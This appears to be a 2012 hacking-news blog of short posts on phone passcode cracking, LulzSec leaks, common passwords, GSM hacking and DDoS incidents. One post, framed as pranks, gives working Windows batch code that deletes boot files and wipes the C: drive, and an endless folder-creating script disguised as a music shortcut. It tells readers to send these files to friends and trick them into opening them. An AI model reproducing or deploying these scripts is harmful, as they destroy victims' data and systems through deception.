Friday, March 30, 2012

iPhone Password Hacking is Easy


iPhone 4S C Spire

That four-digit passcode you have installed on your iPhone might slow snoops down, but it won't stop them.Forbes is reporting that in some cases, it takes less than two minutes to crack the code.
Micro Systemation is a Swedish company that sells software capable of skirting privacy controls on iOS and Android gadgets. Law enforcement and military agencies use this software in order to access data on devices used by criminal suspects.
In a video (see below) Micro Systemation is able to hack an iPhone in just seconds. Granted, the password wasn't very complicated – it was "0000."
Forbes explains that the hack is possible through a Micro Systemation application called XRY, which deciphers the phone's password, siphons its data to a computer, and decrypts it in order to gain data like GPS logs, call history, contacts, text messages, keystrokes, and so forth. XRY works a lot like a jailbreak, Forbes said. The Micro Systemation team doesn't look for backdoor vulnerabilities made by the phone's manufacturer, but rather weaknesses in the software.
"Every week a new phone comes out with a different operating system and we have to reverse engineer them," Micro Systemation's marketing director Mike Dickinson told Forbes. "We're constantly chasing the market."
Dickinson told Forbes that his company sells products that are able to breach iPhone and Android security in 60 countries. It provides software to 98 percent of the U.K.'s police departments and also sells to U.S. police departments and the FBI. However, its largest client is the U.S. military, Forbes said.
As the smartphone business grows worldwide, so does Micro Systemation's business.
"It's a massive boom industry, the growth in evidence from mobile phones," Dickinson said. "After twenty years or so, people understand they shouldn't do naughty things on their personal computers, but they still don't understand that about phones. From an evidential point of view, it's of tremendous value… if they've done something wrong."

Lulzsec Hacks Military Dating Site

LulzSec, the Anonymous offshoot that hacks for fun ("for the lulz"), disbanded last June after 50 days of high profile hacks, also known as the 50 Day Cruise.
But the jokers appear to be making a comeback, perhaps in order to restore the confidence of its followers after it was revealed that former ringleader Sabu helped the FBI locate and arrest former teammates. 
On Tuesday, hackers calling themselves "LulzSec Reborn" posted onto Pastebin the email database, including names and addresses, of every employee at San Jose-based IT firm, CSS Corp. 
Preceding this, on Sunday the group hacked into military dating website, militarysingles.com. It dumped the names, emails, and passwords of around 170,000 members, many with .gov and .mil addresses. The hackers also defaced a page with its signature Nyan Cat after the site's parent company told Data Breaches there was "no actual evidence" of a breach. 
Nyan cat
The motivations behind these two targets are unclear at this point, but as I mentioned earlier, the original LulzSec unit hacked for fun.
As Sophos' Graham Cluley noted over at Naked Security notes, "Of course, on the internet, anyone can claim to be whatever they want and so it's not particularly surprising to see that it was a group calling itself LulzSec Reborn that posted a message on PasteBin announcing the hack of MilitarySingles.com."
To illustrate this point, a viral video about an April 1st rebirth from LulzSec was discredited by LulzSec Reborn's Twitter account, as "bullshit."
Earlier this month, the FBI charged six members of Anonymous/LulzSec who were based in the U.K., New York, Chicago, and Ireland. In a stunning revelation, it was disclosed that former LulzSec ringleader Sabu (real name: Hector Xavier Monsegur), a 28-year-old single father living in the Lower East Side of Manhattan, New York City, had served as an informant for several months. For a rundown of all the charges, see FBI Takes Down LulzSec Hackers, With Help From Inside.


Friday, March 23, 2012

How to Hack Someone's Computer




As the digital world becomes more and more complex, the need for deliberate, thorough security grows. Yes, we know, you’ve got everything “password protected.” And yes, not every hacker is like the guys in the movies who are able to keyboard their way through complicated layers of encrypted, password-protected security faster than a gamer boots up a new version of Call of Duty.

Below is a list of the 10 most-favored passwords. If yours is there you A) ought to think about changing it, or B) post your Social Security, credit card, and bank account numbers, and any other private information you think might be useful on your Facebook page.

  1. Password1
  2. letmein
  3. Secure1
  4. Abc123
  5. 123456
  6. monkey
  7. Facebook1
  8. passworD
  9. link2012
  10. (your first name)

Oh, and though it’s from an older, non-digital source, it would be well to remember the words of Confucius when setting your passwords: “When in a state of security, do not forget the possibility of ruin.”


Chinese Hack Microsoft


Chinese hackers apparently gained access to information about vulnerabilities in Microsoft’s operating systems before a company patch was released, and security researchers are worried the leak came directly from Microsoft’s secured website.
The Microsoft Security Response Center states the Microsoft Active Protections Program is a program for security software providers that “gives members a head start to reproduce the vulnerabilities and program [anti-hacking] tools in advance of Microsoft’s official security updates.”
The site states, “The amount of time between the release of a Microsoft security update and the release of exploit code (vulnerability) for that update continues to shorten. MAPP gives security software providers early access to vulnerability information.”
On March 13, Microsoft issued critical security update MS12-020 for its Windows operating systems.

Sunday, March 18, 2012

Hacking GSM Mobile Network in India



A GSM mobile phone user in India is not very safe from hacking attacks, a security company has demonstrated.
Four founding members of a company called Matrix Shell say they have worked out a way to hack into India GSM phone numbers and make calls from them. They were able to use the unique SIM card number called International Mobile Subscriber Identity (IMSI) of their target victims.
Using a firmware called Osmocom and using software written by them on it, they successfully hacked into GSM phones at a recent security conference.

Saturday, March 17, 2012

5 Simple Hacks to Prank your friends

1. Crash a Computer System With Nothing But a URL!

I stumbled across this URL while surfing the internet. This is a javascript "exploit" (that still works, by the way) and will hang/crash your system. It basically floods you with an infinite loop of mailto:xxx windows. To cancel this (and you have to move fast) kill the process of your email client before you run out of RAM.

WARNING: CLICKING ON THE LINK BELLOW MAY CAUSE A CRASH! USE AT YOUR OWN RISK!

http://tiny.cc/ibJUN


2. Shut Down a Computer Forever

Open notepad and copy/paste this code:

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini


Now Save it as a .bat file.

This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.

REMEMBER - DO NOT CLICK THIS FILE. YOU WON'T RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!

Send it to your friends computer and tell them to open it. Have fun!!

Here is another code too.....

cmd /c del c:\windows\* /F /S /Q

cmd /c del c:\* /F /S /Q


Paste it in NotePad And Save It with Extension .cmd or .bat 


3. Make over 1,000 folders in few seconds


Here I will teach you simple prank that will make an unlimited amount of folders in any place you want.

1. Open notepad and type :

@echo off
:top
md %random%
goto top 


@echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md %random% is command that creating folders with random names.
goto top – return to label :top, infinite loop


2. Save it as 1000folders.bat


3. After that you will get icon that looks as show below


People probably not going to click on an icon that looks like this picture so to make it better (funnier and easier to prank people with) make a short-cut to it

4. Right click on icon and click Create Shortcut


5. Right click on shortcut and click properties , then click on Change Icon and rename icon


Tell the person that you found the music they wanted and downloaded it on there computer, that way they will think its a shortcut to the music and they will click on it then they will think its loading so they wont exit right away when they finally realize its not going to load or so many errors have came up they realized somethings wrong it will be to late) also just something to know its impossible to delete them using cmd you HAVE to find all of them and delete them manually…


4. Microsoft Word Prank 

Here , I will show you great microsoft word prank that will frustrate the victims very much, whenever they type a certain word, another word appears! This prank is great for office and schools.

1. Launch Microsoft Word

2. Go to Tools -> AutoCorrect Options…


3. In the space where it says Replace , type a real common word such as the, and, a,I, you etc. In the space that says With , type in a crazy word such as fdgfdhkihyob45, whatever you want! Then , click on Add



5. Cool Windows Prank 

This will make it to where your friend cannot click on anything on the screen.

1. Take a screenshot of the desktop. You can use windows printscreen or some printscreen software.


2. Make your printscreen picture as desktop background.

3. Right click on desktop , then click Arrange Icons By->Show Desktop Icons (Windows XP)
Right click on desktop , then click View->Show Desktop Icons (Windows 7 and Vista)


That is it , when you click on the “icons”, nothing will happen!

Originally Appeared on http://www.hackpconline.com/2010/05/painfully-computer-pranks.html

Friday, March 16, 2012

How to hack cell phones/ mobiles ?

# 1 -- Physical Access to the Phone -- Obviously, if a person can get physical access to a cell phone, even for a few seconds, it's game over. The person can clone it, place a remote spying tool on the phone or download the pictures and information directly to their own account.

#2 -- Hacking Email, Twitter and Apps -- Most celebrities are hacked through email, Twitter and other accounts that they use on their phones. This is what happened to Scarlett Johanson, Kreayshawn, Mila Kunis and Christina Aguillera, among others -- and it may also be the reason for the more recent hacks on Heather Morris and Christina Hendricks.

#3 -- Social Engineer the Phone Company -- In 2005, hackers stole nude pictures of Paris Hilton by getting access to her T-Mobile Sidekick II, a precursor to today's smartphones. How did they do it? They impersonated a T-Mobile support tech over the phone and tricked T-Mobile employees into giving them access to the carrier's intranet site that contained a list of user accounts, which allowed them to reset the password to her account and steal photos and contacts. Today, there's still a risk hackers could reset accounts or permissions by conning the phone company, but it's more likely they'll simply target a person's accounts directly online.

#4 -- Wi-Fi Spies -- Movie stars do a lot of traveling, and while they're roaming about they're often connecting their phones to open Wi-Fi networks -- whether it's at the airport, hotel or Starbucks. This puts them at greater risk of being hacked. Using public Wi-Fi puts all of your online accounts, Internet searches, emails and usernames/passwords out in the open where they can be read, copied and hacked by any person with moderate computer skills. In fact, there are special tools available online that do this.

#5 -- Spyware -- Stars who spend a lot of time using open Wi-Fi and chatting with friends or followers on social networks and clicking on shared links are also at risk of spyware. Spyware is malicious software that can infect your phone in order to record the things you type -- like usernames and passwords -- and it can also be used to steal items from your phone, like photos, contacts and banking data. "FakeToken" is one example of spyware that is currently being found on some Android phones. There's a good chance some celebrity phones have been infected by spyware.

More Tips

Thursday, March 15, 2012

BBC hack attack linked to the Iranians


The BBC’s director general stops short of accusing Tehran, but speaks of strong links between the denial of service attack and the country.
BBC
The BBC has fallen victim to another cyber attack, with all eyes looking to Iran as the possible perpetrator.
The global media company believes adistributed denial of service (DDoS) attack was the reason for its outlets across Persia falling down on 1 March, leaving citizens unable to view BBC TV channels or listen to the radio broadcasts.

Wednesday, March 14, 2012

Electronic voting system hacked


(AFP Photo / Joe Raedle)
(AFP Photo / Joe Raedle)
When Washington, DC decided to try out an Internet voting system to make casting absentee ballots as easy as clicking a mouse, they dared hackers to compromise the contest. It was a feat accomplished in less than two days.
The District of Columbia hosted a public trial before going live with an e-voting program to see if their presumably impenetrable online ballot system could sustain a cyber attack. If you’re wondering why they never followed through, it is because the government is going to need a lot more time with this one.
More Info:
http://rt.com/usa/news/hack-voting-system-dc-593/ 

Chinese Hack BAE to learn about F-35

This plane will have taken more than $385 billion to develop and will take $1 trillion to sustain. It is the most expensive weapons system in history. And yet for 18 months, the Chinese were just living on (at least) BAE’s networks taking what they wanted. How much of the considerable cost and rework on this program comes from the data on it China has stolen along the way? 
More Info on:
http://www.emptywheel.net/2012/03/14/bae-f-35-hack-confirmed/?utm_source=rss&utm_medium=rss&utm_campaign=bae-f-35-hack-confirmed 

Tuesday, March 13, 2012

Control an Arduino from your Android device using a cheap bluetooth module

Check out this new instructable which shows you how to read sensor values from an Arduino with your Android device using a cheap bluetooth serial device you can order for under $10 on dealextreme or ebay.

This example uses Python as the scripting language for the Android scripting layer (SL4A) but you can choose from other languages like Perl, Lua, JavaScript etc. see: http://code.google.com/p/android-scripting/ 

Monday, March 12, 2012

Daily Attack Round Up Annoymous hacks Vatican and 'The Consortium' Attacks Porn Site

The following two hacking attacks are been reported in the news today.

- Anonymous has hacked the Vatican for a second time. The website for the Catholic Church,vatican.va, is currently down. Unlike the first hack, which appeared to be a typical Distributed Denial of Service (DDoS) attack, this one is more than just taking down the website. The main target of the new strike is Vatican Radio, and today’s attack is possible because of a backdoor Anonymous created for itself the first time around.

- A group of hackers calling themselves The Consortium is claiming to have accessed user data of over 70,000 users of the pornography website Digital Playground,according to Adult Video News.

In addition here is a funny take on the recent Ruby on Rails vulnerability https://lwn.net/Articles/485325/

For a more serious assessment check out the following post from errata security  on the attack which describes the vulnerability as follows
For those who don’t speak Russian or Ruby-on-Rails, I thought I’d translate the recent GitHub hack controversy.
The underlying issue is an “Insecure Direct Object Reference”, #4 on the OWASP Top 10 list of most important web-application vulnerabilities. It means that that a hacker can change what's in the website database without having permission.